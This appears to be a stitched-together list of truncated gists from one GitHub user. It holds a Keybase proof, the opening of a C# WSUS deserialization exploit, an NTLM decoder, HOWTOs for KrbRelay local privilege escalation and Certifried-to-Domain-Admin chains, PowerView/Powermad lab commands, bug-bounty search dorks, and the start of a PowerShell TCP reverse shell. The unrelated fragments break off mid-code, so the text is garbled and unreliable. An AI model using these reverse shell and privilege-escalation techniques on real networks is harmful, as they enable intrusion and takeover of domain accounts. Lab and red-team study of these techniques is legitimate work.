I hereby claim:
- I am k3nundrum on github.
- I am k3nundrum (https://keybase.io/k3nundrum) on keybase.
- I have a public key ASA5SkVPbuqnCcS22F0iyJLxxLEaau8S-LUxoeLGllavOwo
To claim this, I am signing this object:
using System;
using System.IO;
using System.Security.Cryptography;
using System.Runtime.Serialization.Formatters.Binary;
namespace hawktracewsus
{
    class Program
    {
        static void Main()
#!/usr/bin/env python
## Decodes NTLM "Authenticate" HTTP-Header blobs.
## Reads the raw blob from stdin; prints out the contained metadata.
## Supports (auto-detects) Type 1, Type 2, and Type 3 messages.
## Based on the excellent protocol description from:
## <http://davenport.sourceforge.net/ntlm.html>
## with additional detail subsequently added from the official protocol spec:
## <http://msdn.microsoft.com/en-us/library/cc236621.aspx>
##
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-privileged domain user to local system on domain-joined computers.
Prerequisites:
Certifried (CVE-2022-26923) gives Domain Admin from a non-privileged user, with the requirement of being able to add computer accounts or owning a computer account. Kerberos Relay targeting LDAP combined with Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (i.e. ownership of) that machine. Combining the two: a non-privileged domain user escalates to Domain Admin without the requirement of adding or owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:
"            _                   _            "
"        _  /||  .         .   ||\  _        "
"      ( } \||D  '   '   '   C||/ { %        "
"     | /\__,=_[_] ' . . ' [_]_=,__/\ |"
"     |_\_    |----|     |----|    _/_|"
"     |  |/   |    |     |    |   \|  |"
"     |  /_   |    |     |    |   _\  |"
It is all fun and games until someone gets hacked!
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
inurl /bug bounty
inurl : / security
inurl:security.txt
inurl:security "reward"
inurl : /responsible disclosure
inurl : /responsible-disclosure/ reward
inurl : / responsible-disclosure/ swag
inurl : / responsible-disclosure/ bounty
inurl:'/responsible disclosure' hoodie
responsible disclosure swag r=h:com
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
    $writer.Flush();
    $read = $null;